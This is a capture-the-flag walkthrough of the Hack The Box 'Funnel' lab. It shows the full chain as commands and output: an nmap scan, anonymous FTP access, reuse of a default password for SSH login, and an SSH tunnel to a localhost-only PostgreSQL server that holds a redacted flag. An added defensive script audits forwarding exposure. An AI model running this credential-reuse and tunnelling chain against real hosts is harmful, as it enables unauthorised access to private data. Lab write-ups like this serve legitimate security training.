HTB Funnel

$ nmap -v -sV -p- 10.129.74.179 --min-rate 5000

Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-04 10:15 CET
NSE: Loaded 45 scripts for scanning.
Initiating Ping Scan at 10:15
Scanning 10.129.74.179 [2 ports]
Completed Ping Scan at 10:15, 0.04s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 10:15
Completed Parallel DNS resolution of 1 host. at 10:15, 0.02s elapsed
Initiating Connect Scan at 10:15
Scanning 10.129.74.179 [65535 ports]
Discovered open port 21/tcp on 10.129.74.179
Discovered open port 22/tcp on 10.129.74.179
Completed Connect Scan at 10:15, 12.86s elapsed (65535 total ports)
Initiating Service scan at 10:15
Scanning 2 services on 10.129.74.179
Completed Service scan at 10:15, 0.09s elapsed (2 services on 1 host)
NSE: Script scanning 10.129.74.179.
Initiating NSE at 10:15
Completed NSE at 10:15, 0.00s elapsed
Initiating NSE at 10:15
Completed NSE at 10:15, 0.00s elapsed
Nmap scan report for 10.129.74.179
Host is up (0.037s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.25 seconds

$ ftp 10.129.74.179

Connected to 10.129.74.179.
220 (vsFTPd 3.0.3)
Name (10.129.74.179:ruben): anonymous
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
229 Entering Extended Passive Mode (|||33254|)
150 Here comes the directory listing.
drwxr-xr-x    2 ftp      ftp          4096 Nov 28 14:31 mail_backup
226 Directory send OK.
ftp> 

Users detected:

 optimus@funnel.htb 
 albert@funnel.htb 
 andreas@funnel.htb 
 christine@funnel.htb 
 maria@funnel.htb

According to the password policy found, the default password is funnel123#!#

$ ssh christine@10.129.74.179

christine@10.129.74.179's password: 
Welcome to Ubuntu 20.04.5 LTS (GNU/Linux 5.4.0-135-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Sat 04 Mar 2023 09:30:41 AM UTC

  System load:              0.0
  Usage of /:               63.2% of 4.78GB
  Memory usage:             12%
  Swap usage:               0%
  Processes:                159
  Users logged in:          0
  IPv4 address for docker0: 172.17.0.1
  IPv4 address for ens160:  10.129.74.179
  IPv6 address for ens160:  dead:beef::250:56ff:fe96:a7ea

 * Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s
   just raised the bar for easy, resilient and secure K8s cluster deployment.

   https://ubuntu.com/engage/secure-kubernetes-at-the-edge

0 updates can be applied immediately.


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Which service is running on TCP port 5432 and listens only on localhost?

christine@funnel:~$ ss -tulpn

Netid  State   Recv-Q  Send-Q  Local Address:Port  Peer Address:Port  Process
udp    UNCONN  0       0       127.0.0.53%lo:53    0.0.0.0:*
udp    UNCONN  0       0       0.0.0.0:68          0.0.0.0:*
tcp    LISTEN  0       4096    127.0.0.1:36709     0.0.0.0:*
tcp    LISTEN  0       4096    127.0.0.53%lo:53    0.0.0.0:*
tcp    LISTEN  0       128     0.0.0.0:22          0.0.0.0:*
tcp    LISTEN  0       4096    127.0.0.1:5432      0.0.0.0:*
tcp    LISTEN  0       32      *:21                *:*
tcp    LISTEN  0       128     [::]:22             [::]:*

Port 5432 is usually used by PostgreSQL.

Because this service listens only on the target's localhost, we cannot reach it directly from our local machine. We need to create an SSH tunnel and connect to the service through it from our machine.

$ ssh -L 1234:localhost:5432 christine@10.129.74.179

christine@10.129.74.179's password: 
Last login: Sat Mar  4 10:10:01 2023 from 10.10.14.16
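
The tunnel above works because sshd allows TCP forwarding, so a service bound only to localhost is still reachable by any account that can log in over SSH. As an added example (not part of the original write-up), this defender-side audit parses `ss -tulpn` output in the format shown above together with `sshd -T` output and reports which loopback-only listeners are reachable that way; the function names and both sample inputs are constructed assumptions.

```shell
#!/bin/sh
# Added example (not from the write-up): which loopback-only TCP listeners
# can an SSH user reach with local port forwarding (ssh -L)?

# Constructed sample: the TCP rows of the `ss -tulpn` output shown above.
SS_SAMPLE='tcp LISTEN 0 4096 127.0.0.1:36709 0.0.0.0:*
tcp LISTEN 0 4096 127.0.0.53%lo:53 0.0.0.0:*
tcp LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
tcp LISTEN 0 4096 127.0.0.1:5432 0.0.0.0:*
tcp LISTEN 0 32 *:21 *:*
tcp LISTEN 0 128 [::]:22 [::]:*'

# Constructed sample of `sshd -T` (effective config); values are assumptions.
SSHD_SAMPLE='port 22
allowtcpforwarding yes
gatewayports no'

# Read `ss -tulpn` output on stdin; print the ports of TCP listeners that
# are bound only to a loopback address (127.0.0.0/8 or ::1), sorted.
loopback_ports() {
    awk '$1 == "tcp" && $2 == "LISTEN" {
        port = $5; sub(/.*:/, "", port)       # text after the last colon
        host = $5; sub(/:[^:]*$/, "", host)   # text before the last colon
        sub(/%.*/, "", host)                  # drop interface suffix (%lo)
        if (host ~ /^127\./ || host == "[::1]") print port
    }' | sort -n | tr '\n' ' ' | sed 's/ $//'
}

# Read `sshd -T` output on stdin; succeed if local forwarding is permitted.
# A missing keyword is treated as the sshd default, which is "yes".
forwarding_allowed() {
    awk 'tolower($1) == "allowtcpforwarding" { v = tolower($2) }
         END { exit !(v == "" || v == "yes" || v == "all" || v == "local") }'
}

# $1 = ss output, $2 = sshd -T output
audit() {
    ports=$(printf '%s\n' "$1" | loopback_ports)
    if printf '%s\n' "$2" | forwarding_allowed; then
        echo "EXPOSED via ssh -L: $ports"
    else
        echo "forwarding disabled; loopback-only: $ports"
    fi
}

audit "$SS_SAMPLE" "$SSHD_SAMPLE"
```

On a live host, run it as `audit "$(ss -tulpn)" "$(sudo sshd -T)"`. Setting `AllowTcpForwarding no`, or a restrictive `PermitOpen`, in a `Match User` block of sshd_config closes this path for accounts that do not need it.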

$ psql -U christine -h localhost -p 1234

Contraseña para usuario christine: 
psql (15.2 (Debian 15.2-1), servidor 15.1 (Debian 15.1-1.pgdg110+1))
Digite «help» para obtener ayuda.

christine=# \l

                                                      Listado de base de datos
  Nombre   |   Dueño   | Codificación |  Collate   |   Ctype    | configuración ICU | Proveedor de locale |       Privilegios       
-----------+-----------+--------------+------------+------------+-------------------+---------------------+-------------------------
 christine | christine | UTF8         | en_US.utf8 | en_US.utf8 |                   | libc                | 
 postgres  | christine | UTF8         | en_US.utf8 | en_US.utf8 |                   | libc                | 
 secrets   | christine | UTF8         | en_US.utf8 | en_US.utf8 |                   | libc                | 
 template0 | christine | UTF8         | en_US.utf8 | en_US.utf8 |                   | libc                | =c/christine           +
           |           |              |            |            |                   |                     | christine=CTc/christine
 template1 | christine | UTF8         | en_US.utf8 | en_US.utf8 |                   | libc                | =c/christine           +
           |           |              |            |            |                   |                     | christine=CTc/christine
(5 filas)

christine=# \c secrets

psql (15.2 (Debian 15.2-1), servidor 15.1 (Debian 15.1-1.pgdg110+1))
Ahora está conectado a la base de datos «secrets» con el usuario «christine».
secrets=# \dt
        Listado de relaciones
 Esquema | Nombre | Tipo  |   Dueño   
---------+--------+-------+-----------
 public  | flag   | tabla | christine
(1 fila)

secrets=# SELECT * FROM flag;
              value               
----------------------------------
 cf27XXXXXXXXXXXXXXXXXXXXXXXXXXXX
(1 fila)

secrets=#